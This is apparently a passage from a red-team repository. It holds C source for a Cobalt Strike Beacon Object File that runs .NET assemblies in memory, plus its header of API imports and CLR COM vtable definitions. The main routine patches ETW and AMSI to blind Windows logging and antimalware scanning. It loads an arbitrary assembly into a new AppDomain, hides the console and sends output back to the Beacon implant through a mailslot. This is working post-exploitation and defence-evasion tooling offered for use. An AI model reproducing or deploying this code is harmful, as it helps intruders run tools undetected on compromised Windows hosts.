        for (long i = 0; i < argumentCount; i++)
        {
            if (argumentsArray[i] != NULL) {
                OLEAUT32$SafeArrayPutElement(ctx.vtPsa.parray, &i, OLEAUT32$SysAllocString(argumentsArray[i]));
            }
        }
    }

    //Break ETW
    if (etw != 0 || revertETW != 0) {
        success = patchETW(0);

        if (success != 1) {
            BeaconPrintf(CALLBACK_ERROR , "[!] Patching ETW failed. Try running without patching ETW");
            PerformCleanup(&ctx, FALSE, FALSE);
            return;
        }
    }

    //Start CLR
    success = StartCLR((LPCWSTR)wNetVersion, &ctx.pClrMetaHost, &ctx.pClrRuntimeInfo, &ctx.pICorRuntimeHost);

    if (success != 1) {
        PerformCleanup(&ctx, FALSE, revertETW);
        return;
    }

    // Create unique mutex for synchronization
    char mutexName[TMPBUFLEN] = { 'm', 'x', '-' };
    gen_rand_str(mutexName, 3, 12);
    HANDLE hMutex = KERNEL32$CreateMutexA(NULL, TRUE, mutexName);

    success = MakeSlot(ctx.slotPath, &ctx.mainHandle);
    if (!success) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to create mailslot");
        KERNEL32$ReleaseMutex(hMutex);
        KERNEL32$CloseHandle(hMutex);
        PerformCleanup(&ctx, FALSE, revertETW);
        return;
    }

    ctx.hFile = KERNEL32$CreateFileA(ctx.slotPath, GENERIC_WRITE, FILE_SHARE_READ, (LPSECURITY_ATTRIBUTES)NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, (HANDLE)NULL);

    KERNEL32$ReleaseMutex(hMutex);
    KERNEL32$CloseHandle(hMutex);

    if (ctx.hFile == INVALID_HANDLE_VALUE) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open mailslot for writing");
        PerformCleanup(&ctx, FALSE, revertETW);
        return;
    }

    //Attach or create console
    BOOL attConsole = consoleExists();

    if (attConsole != 1)
    {
        frConsole = 1;
        _AllocConsole AllocConsole = (_AllocConsole) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32.dll"), "AllocConsole");
        _GetConsoleWindow GetConsoleWindow = (_GetConsoleWindow) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32.dll"), "GetConsoleWindow");
        AllocConsole();

        //Hide Console Window
        ctx.hUser32 = KERNEL32$LoadLibraryA("user32.dll");
        if (ctx.hUser32) {
            _ShowWindow ShowWindow = (_ShowWindow)KERNEL32$GetProcAddress(ctx.hUser32, "ShowWindow");
            HWND wnd = GetConsoleWindow();
            if (wnd)
                ShowWindow(wnd, SW_HIDE);
        }
    }

    //Get current stdout handle
    _GetStdHandle GetStdHandle = (_GetStdHandle) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32.dll"), "GetStdHandle");
    stdOutput = GetStdHandle(((DWORD)-11));

    //Set stdout to our named pipe or mail slot
    _SetStdHandle SetStdHandle = (_SetStdHandle) KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32.dll"), "SetStdHandle");
    success = SetStdHandle(((DWORD)-11), ctx.hFile);

    //Create our AppDomain
    hr = ctx.pICorRuntimeHost->lpVtbl->CreateDomain(ctx.pICorRuntimeHost, (LPCWSTR)ctx.wAppDomain, NULL, &ctx.pAppDomainThunk);
    if (hr != S_OK) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to create AppDomain");
        SetStdHandle(((DWORD)-11), stdOutput);
        PerformCleanup(&ctx, frConsole, revertETW);
        return;
    }

    hr = ctx.pAppDomainThunk->lpVtbl->QueryInterface(ctx.pAppDomainThunk, &xIID_AppDomain, (VOID**)&ctx.pAppDomain);
    if (hr != S_OK) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to query AppDomain interface");
        SetStdHandle(((DWORD)-11), stdOutput);
        PerformCleanup(&ctx, frConsole, revertETW);
        return;
    }

    //Patch amsi
    if (amsi != 0) {
        success = patchAMSI();

        if (success != 1) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Patching AMSI failed. Try running without patching AMSI and using obfuscation");
            SetStdHandle(((DWORD)-11), stdOutput);
            PerformCleanup(&ctx, frConsole, revertETW);
            return;
        }
    }

    //Prep SafeArray
    SAFEARRAYBOUND rgsabound[1] = { 0 };
    rgsabound[0].cElements = assemblyByteLen;
    rgsabound[0].lLbound = 0;
    ctx.pSafeArray = OLEAUT32$SafeArrayCreate(VT_UI1, 1, rgsabound);
    if (!ctx.pSafeArray) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to create SafeArray");
        SetStdHandle(((DWORD)-11), stdOutput);
        PerformCleanup(&ctx, frConsole, revertETW);
        return;
    }

    void* pvData = NULL;
    hr = OLEAUT32$SafeArrayAccessData(ctx.pSafeArray, &pvData);
    if (hr != S_OK) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to access SafeArray data");
        SetStdHandle(((DWORD)-11), stdOutput);
        PerformCleanup(&ctx, frConsole, revertETW);
        return;
    }

    MSVCRT$memcpy(pvData, assemblyBytes, assemblyByteLen);
    hr = OLEAUT32$SafeArrayUnaccessData(ctx.pSafeArray);

    //Load assembly
    hr = ctx.pAppDomain->lpVtbl->Load_3(ctx.pAppDomain, ctx.pSafeArray, &ctx.pAssembly);
    if (hr != S_OK) {
        BeaconPrintf(CALLBACK_ERROR , "[!] Process refusing to load AppDomain of %ls CLR version. Try running an assembly that requires a differnt CLR version.\n", wNetVersion);
        SetStdHandle(((DWORD)-11), stdOutput);
        PerformCleanup(&ctx, frConsole, revertETW);
        return;
    }

    hr = ctx.pAssembly->lpVtbl->EntryPoint(ctx.pAssembly, &ctx.pMethodInfo);
    if (hr != S_OK) {
        BeaconPrintf(CALLBACK_ERROR , "[!] Process refusing to find entry point of assembly.\n");
        SetStdHandle(((DWORD)-11), stdOutput);
        PerformCleanup(&ctx, frConsole, revertETW);
        return;
    }

    ZeroMemory(&ctx.retVal, sizeof(VARIANT));
    ZeroMemory(&ctx.obj, sizeof(VARIANT));
    ctx.obj.vt = VT_NULL;

    ctx.psaStaticMethodArgs = OLEAUT32$SafeArrayCreateVector(VT_VARIANT, 0, (ULONG)entryPoint);
    if (!ctx.psaStaticMethodArgs) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to create method args array");
        SetStdHandle(((DWORD)-11), stdOutput);
        PerformCleanup(&ctx, frConsole, revertETW);
        return;
    }

    long idx[1] = { 0 };
    OLEAUT32$SafeArrayPutElement(ctx.psaStaticMethodArgs, idx, &ctx.vtPsa);

    //Invoke our .NET Method
    hr = ctx.pMethodInfo->lpVtbl->Invoke_3(ctx.pMethodInfo, ctx.obj, ctx.psaStaticMethodArgs, &ctx.retVal);

    // Use hybrid reading for mailslots with improved chunking
    BOOL bufferMode = ReadSlotHybrid(ctx.returnData, ctx.returnDataSize, &ctx.mainHandle, &ctx.hEvent);
    ctx.useChunking = !bufferMode;

    // Send output only if not already sent in chunks
    if (!ctx.useChunking) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n\n%s\n", ctx.returnData);
    }

    //Revert stdout back to original handles
    SetStdHandle(((DWORD)-11), stdOutput);

    //Cleanup everything
    PerformCleanup(&ctx, frConsole, revertETW);
}

================================================
FILE: Execution-BOF/execute-assembly/inlineExecute-Assembly.h
================================================
#pragma once
#include <windows.h>
#include "sal.h"

/*BOF Defs*/
#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr)
#define intRealloc(ptr, size) (ptr) ? KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, ptr, size) : KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
BOOL patchETW(BOOL revertETW);

// Define _TRUNCATE if not already defined
#ifndef _TRUNCATE
#define _TRUNCATE ((size_t)-1)
#endif

//MSVCRT
WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T);
WINBASEAPI void* __cdecl MSVCRT$memcpy(void* __restrict _Dst, const void* __restrict _Src, size_t _MaxCount);
WINBASEAPI void __cdecl MSVCRT$memset(void* dest, int c, size_t count);
WINBASEAPI int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2);
WINBASEAPI SIZE_T WINAPI MSVCRT$strlen(const char* str);
WINBASEAPI int __cdecl MSVCRT$_snprintf(char* s, size_t n, const char* fmt, ...);
WINBASEAPI errno_t __cdecl MSVCRT$mbstowcs_s(size_t* pReturnValue, wchar_t* wcstr, size_t sizeInWords, const char* mbstr, size_t count);
WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str);
WINBASEAPI char* WINAPI MSVCRT$_strlwr(char * str);
WINBASEAPI char* WINAPI MSVCRT$strrchr(char * str);
WINBASEAPI int __cdecl MSVCRT$_open_osfhandle (intptr_t osfhandle, int flags);
WINBASEAPI int __cdecl MSVCRT$_dup2( int fd1, int fd2 );
WINBASEAPI int __cdecl MSVCRT$_close(int fd);
WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
//KERNEL32
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI int WINAPI KERNEL32$lstrlenA(LPCSTR lpString);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateMailslotA(LPCSTR lpName, DWORD nMaxMessageSize, DWORD lReadTimeout, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
WINBASEAPI BOOL WINAPI KERNEL32$GetMailslotInfo(HANDLE  hMailslot, LPDWORD lpMaxMessageSize, LPDWORD lpNextSize, LPDWORD lpMessageCount, LPDWORD lpReadTimeout);
WINBASEAPI BOOL WINAPI KERNEL32$ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);
DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalAlloc(UINT uFlags, SIZE_T dwBytes);
DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalFree(HGLOBAL hMem);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualProtect (PVOID, DWORD, DWORD, PDWORD);
WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);
WINBASEAPI LPVOID WINAPI KERNEL32$HeapReAlloc (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID);
WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateMutexA(LPSECURITY_ATTRIBUTES lpMutexAttributes, BOOL bInitialOwner, LPCSTR lpName);
WINBASEAPI BOOL WINAPI KERNEL32$ReleaseMutex(HANDLE hMutex);
WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);

WINBASEAPI BOOL WINAPI KERNEL32$FreeLibrary(HMODULE hLibModule);
WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR lpLibFileName);
WINBASEAPI HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR lpModuleName);
WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE hModule, LPCSTR lpProcName);
WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID);
WINBASEAPI VOID WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo);
WINBASEAPI SIZE_T WINAPI KERNEL32$VirtualQuery(LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);

//SHELL32
WINBASEAPI LPWSTR* WINAPI SHELL32$CommandLineToArgvW(LPCWSTR lpCmdLine, int* pNumArgs);
//MSCOREE
WINBASEAPI HRESULT WINAPI MSCOREE$CLRCreateInstance(REFCLSID clsid, REFIID riid, LPVOID* ppInterface);
//OLEAUT32
WINBASEAPI SAFEARRAY* WINAPI OLEAUT32$SafeArrayCreateVector(VARTYPE vt, LONG lLbound, ULONG   cElements);
WINBASEAPI SAFEARRAY* WINAPI OLEAUT32$SafeArrayCreate(VARTYPE vt, UINT cDims, SAFEARRAYBOUND* rgsabound);
WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY* psa, void HUGEP** ppvData);
WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY* psa);
WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayPutElement(SAFEARRAY* psa, LONG* rgIndices, void* pv);
WINBASEAPI HRESULT WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY* psa);
WINBASEAPI HRESULT WINAPI OLEAUT32$VariantClear(VARIANTARG* pvarg);
WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR* psz);

#define intZeroMemory(addr,size) memset((addr),0,size)
#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define memset MSVCRT$memset
//#define stdout (__acrt_iob_func(1))
#define STATUS_SUCCESS 0
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )

/*GetProcAddess Pointers*/
typedef DWORD (WINAPI* _GetCurrentProcessId) (void);
typedef BOOL (WINAPI* _AttachConsole) (DWORD dwProcessId);
typedef BOOL (WINAPI* _AllocConsole) (void);
typedef HWND (WINAPI* _GetConsoleWindow) (void);
typedef BOOL (WINAPI* _ShowWindow) (HWND hWnd, int nCmdShow);
typedef BOOL (WINAPI* _FreeConsole) (void);
typedef BOOL (WINAPI* _SetStdHandle) (DWORD nStdHandle, HANDLE hHandle);
typedef HANDLE (WINAPI* _GetStdHandle) (DWORD nStdHandle);
typedef BOOL (WINAPI* _CloseHandle) (HANDLE hObject);
typedef _Post_equals_last_error_ DWORD (WINAPI* _GetLastError) (void);
//typedef int (WINAPI* _WideCharToMultiByte) (UINT CodePage, DWORD dwFlags, _In_NLS_string_(cchWideChar)LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);
typedef LPVOID (WINAPI* _CoTaskMemAlloc) (SIZE_T cb);
//typedef LPVOID (WINAPI* _CoTaskMemFree) (_Frees_ptr_opt_ LPVOID pv);
typedef HANDLE (WINAPI* _CreateNamedPipeA) (LPCSTR lpName, DWORD dwOpenMode, DWORD dwPipeMode, DWORD nMaxInstances, DWORD nOutBufferSize, DWORD nInBufferSize, DWORD nDefaultTimeOut, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG);//NtWriteVirtualMemory
typedef NTSTATUS(NTAPI* _NtProtectVirtualMemory)(HANDLE, PVOID, PULONG, ULONG, PULONG);//NtProtectVirtualMemory

/*CLR GUIDS, Stucts -> Mostly from https://github.com/TheWover/donut*/
static GUID xIID_AppDomain = {
  0x05F696DC, 0x2B29, 0x3663, {0xAD, 0x8B, 0xC4,0x38, 0x9C, 0xF2, 0xA7, 0x13} };

static GUID xCLSID_CLRMetaHost = {
  0x9280188d, 0xe8e, 0x4867, {0xb3, 0xc, 0x7f, 0xa8, 0x38, 0x84, 0xe8, 0xde} };

static GUID xIID_ICLRMetaHost = {
  0xD332DB9E, 0xB9B3, 0x4125, {0x82, 0x07, 0xA1, 0x48, 0x84, 0xF5, 0x32, 0x16} };

static GUID xIID_ICLRRuntimeInfo = {
  0xBD39D1D2, 0xBA2F, 0x486a, {0x89, 0xB0, 0xB4, 0xB0, 0xCB, 0x46, 0x68, 0x91} };

static GUID xIID_ICorRuntimeHost = {
  0xcb2f6722, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e} };

static GUID xCLSID_CorRuntimeHost = {
  0xcb2f6723, 0xab3a, 0x11d2, {0x9c, 0x40, 0x00, 0xc0, 0x4f, 0xa3, 0x0a, 0x3e} };


GUID        xIID_IUnknown;
GUID        xIID_IDispatch;

//GUID required to load .NET assemblies
//GUID        xCLSID_CLRMetaHost;
//GUID        xIID_ICLRMetaHost;
//GUID        xIID_ICLRRuntimeInfo;
//GUID        xCLSID_CorRuntimeHost;
//GUID        xIID_ICorRuntimeHost;
//GUID        xIID_AppDomain;

typedef struct _ICLRMetaHost            ICLRMetaHost;
typedef struct _ICLRRuntimeInfo         ICLRRuntimeInfo;
typedef struct _ICorRuntimeHost         ICorRuntimeHost;
typedef struct _ICorConfiguration       ICorConfiguration;
typedef struct _IGCThreadControl        IGCThreadControl;
typedef struct _IGCHostControl          IGCHostControl;
typedef struct _IDebuggerThreadControl  IDebuggerThreadControl;
typedef struct _AppDomain               IAppDomain;
typedef struct _Assembly                IAssembly;
typedef struct _Type                    IType;
typedef struct _Binder                  IBinder;
typedef struct _MethodInfo              IMethodInfo;

typedef void* HDOMAINENUM;

typedef HRESULT(__stdcall* CLRCreateInstanceFnPtr)(
    REFCLSID clsid,
    REFIID riid,
    LPVOID* ppInterface);

typedef HRESULT(__stdcall* CreateInterfaceFnPtr)(
    REFCLSID clsid,
    REFIID riid,
    LPVOID* ppInterface);


typedef HRESULT(__stdcall* CallbackThreadSetFnPtr)(void);

typedef HRESULT(__stdcall* CallbackThreadUnsetFnPtr)(void);

typedef void(__stdcall* RuntimeLoadedCallbackFnPtr)(
    ICLRRuntimeInfo* pRuntimeInfo,
    CallbackThreadSetFnPtr pfnCallbackThreadSet,
    CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);

#undef DUMMY_METHOD
#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)

typedef struct _BinderVtbl {
    HRESULT(STDMETHODCALLTYPE* QueryInterface)(
        IBinder* This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */ void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        IBinder* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        IBinder* This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);
    DUMMY_METHOD(Invoke);
    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(BindToMethod);
    DUMMY_METHOD(BindToField);
    DUMMY_METHOD(SelectMethod);
    DUMMY_METHOD(SelectProperty);
    DUMMY_METHOD(ChangeType);
    DUMMY_METHOD(ReorderArgumentArray);
} BinderVtbl;

typedef struct _Binder {
    BinderVtbl* lpVtbl;
} Binder;

#undef DUMMY_METHOD
#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)

typedef struct _AppDomainVtbl {
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            IAppDomain* This,
            /* [in] */ REFIID riid,
            /* [iid_is][out] */ void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        IAppDomain* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        IAppDomain* This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);
    DUMMY_METHOD(Invoke);

    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(InitializeLifetimeService);
    DUMMY_METHOD(GetLifetimeService);
    DUMMY_METHOD(Evidence);
    DUMMY_METHOD(add_DomainUnload);
    DUMMY_METHOD(remove_DomainUnload);
    DUMMY_METHOD(add_AssemblyLoad);
    DUMMY_METHOD(remove_AssemblyLoad);
    DUMMY_METHOD(add_ProcessExit);
    DUMMY_METHOD(remove_ProcessExit);
    DUMMY_METHOD(add_TypeResolve);
    DUMMY_METHOD(remove_TypeResolve);
    DUMMY_METHOD(add_ResourceResolve);
    DUMMY_METHOD(remove_ResourceResolve);
    DUMMY_METHOD(add_AssemblyResolve);
    DUMMY_METHOD(remove_AssemblyResolve);
    DUMMY_METHOD(add_UnhandledException);
    DUMMY_METHOD(remove_UnhandledException);
    DUMMY_METHOD(DefineDynamicAssembly);
    DUMMY_METHOD(DefineDynamicAssembly_2);
    DUMMY_METHOD(DefineDynamicAssembly_3);
    DUMMY_METHOD(DefineDynamicAssembly_4);
    DUMMY_METHOD(DefineDynamicAssembly_5);
    DUMMY_METHOD(DefineDynamicAssembly_6);
    DUMMY_METHOD(DefineDynamicAssembly_7);
    DUMMY_METHOD(DefineDynamicAssembly_8);
    DUMMY_METHOD(DefineDynamicAssembly_9);
    DUMMY_METHOD(CreateInstance);
    DUMMY_METHOD(CreateInstanceFrom);
    DUMMY_METHOD(CreateInstance_2);
    DUMMY_METHOD(CreateInstanceFrom_2);
    DUMMY_METHOD(CreateInstance_3);
    DUMMY_METHOD(CreateInstanceFrom_3);
    DUMMY_METHOD(Load);
    DUMMY_METHOD(Load_2);

    HRESULT(STDMETHODCALLTYPE* Load_3)(
        IAppDomain* This,
        SAFEARRAY* rawAssembly,
        IAssembly** pRetVal);

    DUMMY_METHOD(Load_4);
    DUMMY_METHOD(Load_5);
    DUMMY_METHOD(Load_6);
    DUMMY_METHOD(Load_7);
    DUMMY_METHOD(ExecuteAssembly);
    DUMMY_METHOD(ExecuteAssembly_2);
    DUMMY_METHOD(ExecuteAssembly_3);
    DUMMY_METHOD(FriendlyName);
    DUMMY_METHOD(BaseDirectory);
    DUMMY_METHOD(RelativeSearchPath);
    DUMMY_METHOD(ShadowCopyFiles);
    DUMMY_METHOD(GetAssemblies);
    DUMMY_METHOD(AppendPrivatePath);
    DUMMY_METHOD(ClearPrivatePath);
    DUMMY_METHOD(SetShadowCopyPath);
    DUMMY_METHOD(ClearShadowCopyPath);
    DUMMY_METHOD(SetCachePath);
    DUMMY_METHOD(SetData);
    DUMMY_METHOD(GetData);
    DUMMY_METHOD(SetAppDomainPolicy);
    DUMMY_METHOD(SetThreadPrincipal);
    DUMMY_METHOD(SetPrincipalPolicy);
    DUMMY_METHOD(DoCallBack);
    DUMMY_METHOD(DynamicDirectory);

    END_INTERFACE
} AppDomainVtbl;

typedef struct _AppDomain {
    AppDomainVtbl* lpVtbl;
} AppDomain;

#undef DUMMY_METHOD
#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This)

typedef struct _AssemblyVtbl {
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            IAssembly* This,
            REFIID riid,
            void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        IAssembly* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        IAssembly* This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);

    DUMMY_METHOD(Invoke);
    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(CodeBase);
    DUMMY_METHOD(EscapedCodeBase);
    DUMMY_METHOD(GetName);
    DUMMY_METHOD(GetName_2);
    DUMMY_METHOD(FullName);

    HRESULT(STDMETHODCALLTYPE* EntryPoint)(
        IAssembly* This,
        IMethodInfo** pRetVal);

    HRESULT(STDMETHODCALLTYPE* GetType_2)(
        IAssembly* This,
        BSTR        name,
        IType** pRetVal);

    DUMMY_METHOD(GetType_3);
    DUMMY_METHOD(GetExportedTypes);
    DUMMY_METHOD(GetTypes);
    DUMMY_METHOD(GetManifestResourceStream);
    DUMMY_METHOD(GetManifestResourceStream_2);
    DUMMY_METHOD(GetFile);
    DUMMY_METHOD(GetFiles);
    DUMMY_METHOD(GetFiles_2);
    DUMMY_METHOD(GetManifestResourceNames);
    DUMMY_METHOD(GetManifestResourceInfo);
    DUMMY_METHOD(Location);
    DUMMY_METHOD(Evidence);
    DUMMY_METHOD(GetCustomAttributes);
    DUMMY_METHOD(GetCustomAttributes_2);
    DUMMY_METHOD(IsDefined);
    DUMMY_METHOD(GetObjectData);
    DUMMY_METHOD(add_ModuleResolve);
    DUMMY_METHOD(remove_ModuleResolve);
    DUMMY_METHOD(GetType_4);
    DUMMY_METHOD(GetSatelliteAssembly);
    DUMMY_METHOD(GetSatelliteAssembly_2);
    DUMMY_METHOD(LoadModule);
    DUMMY_METHOD(LoadModule_2);
    DUMMY_METHOD(CreateInstance);
    DUMMY_METHOD(CreateInstance_2);
    DUMMY_METHOD(CreateInstance_3);
    DUMMY_METHOD(GetLoadedModules);
    DUMMY_METHOD(GetLoadedModules_2);
    DUMMY_METHOD(GetModules);
    DUMMY_METHOD(GetModules_2);
    DUMMY_METHOD(GetModule);
    DUMMY_METHOD(GetReferencedAssemblies);
    DUMMY_METHOD(GlobalAssemblyCache);

    END_INTERFACE
} AssemblyVtbl;

typedef enum _BindingFlags {
    BindingFlags_Default = 0,
    BindingFlags_IgnoreCase = 1,
    BindingFlags_DeclaredOnly = 2,
    BindingFlags_Instance = 4,
    BindingFlags_Static = 8,
    BindingFlags_Public = 16,
    BindingFlags_NonPublic = 32,
    BindingFlags_FlattenHierarchy = 64,
    BindingFlags_InvokeMethod = 256,
    BindingFlags_CreateInstance = 512,
    BindingFlags_GetField = 1024,
    BindingFlags_SetField = 2048,
    BindingFlags_GetProperty = 4096,
    BindingFlags_SetProperty = 8192,
    BindingFlags_PutDispProperty = 16384,
    BindingFlags_PutRefDispProperty = 32768,
    BindingFlags_ExactBinding = 65536,
    BindingFlags_SuppressChangeType = 131072,
    BindingFlags_OptionalParamBinding = 262144,
    BindingFlags_IgnoreReturn = 16777216
} BindingFlags;

typedef struct _Assembly {
    AssemblyVtbl* lpVtbl;
} Assembly;

#undef DUMMY_METHOD
#define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This)

typedef struct _TypeVtbl {
    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE* QueryInterface)(
            IType* This,
            REFIID riid,
            void** ppvObject);

    ULONG(STDMETHODCALLTYPE* AddRef)(
        IType* This);

    ULONG(STDMETHODCALLTYPE* Release)(
        IType* This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);
    DUMMY_METHOD(Invoke);

    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(MemberType);
    DUMMY_METHOD(name);
    DUMMY_METHOD(DeclaringType);
    DUMMY_METHOD(ReflectedType);
    DUMMY_METHOD(GetCustomAttributes);
    DUMMY_METHOD(GetCustomAttributes_2);
    DUMMY_METHOD(IsDefined);
    DUMMY_METHOD(Guid);
    DUMMY_METHOD(Module);
    DUMMY_METHOD(Assembly);
    DUMMY_METHOD(TypeHandle);
    DUMMY_METHOD(FullName);
    DUMMY_METHOD(Namespace);
    DUMMY_METHOD(AssemblyQualifiedName);
    DUMMY_METHOD(GetArrayRank);
    DUMMY_METHOD(BaseType);
    DUMMY_METHOD(GetConstructors);
    DUMMY_METHOD(GetInterface);
    DUMMY_METHOD(GetInterfaces);
    DUMMY_METHOD(FindInterfaces);
    DUMMY_METHOD(GetEvent);
    DUMMY_METHOD(GetEvents);
    DUMMY_METHOD(GetEvents_2);
    DUMMY_METHOD(GetNestedTypes);
    DUMMY_METHOD(GetNestedType);
    DUMMY_METHOD(GetMember);
    DUMMY_METHOD(GetDefaultMembers);
    DUMMY_METHOD(FindMembers);
    DUMMY_METHOD(GetElementType);
    DUMMY_METHOD(IsSubclassOf);
    DUMMY_METHOD(IsInstanceOfType);
    DUMMY_METHOD(IsAssignableFrom);
    DUMMY_METHOD(GetInterfaceMap);
    DUMMY_METHOD(GetMethod);
    DUMMY_METHOD(GetMethod_2);
    DUMMY_METHOD(GetMethods);
    DUMMY_METHOD(GetField);
    DUMMY_METHOD(GetFields);
    DUMMY_METHOD(GetProperty);
    DUMMY_METHOD(GetProperty_2);
    DUMMY_METHOD(GetProperties);
    DUMMY_METHOD(GetMember_2);
    DUMMY_METHOD(GetMembers);
    DUMMY_METHOD(InvokeMember);
    DUMMY_METHOD(UnderlyingSystemType);
    DUMMY_METHOD(InvokeMember_2);

    HRESULT(STDMETHODCALLTYPE* InvokeMember_3)(
        IType* This,
        BSTR         name,
        BindingFlags invokeAttr,
        IBinder* Binder,
        VARIANT      Target,
        SAFEARRAY* args,
        VARIANT* pRetVal);

    DUMMY_METHOD(GetConstructor);
    DUMMY_METHOD(GetConstructor_2);
    DUMMY_METHOD(GetConstructor_3);
    DUMMY_METHOD(GetConstructors_2);
    DUMMY_METHOD(TypeInitializer);
    DUMMY_METHOD(GetMethod_3);
    DUMMY_METHOD(GetMethod_4);
    DUMMY_METHOD(GetMethod_5);
    DUMMY_METHOD(GetMethod_6);
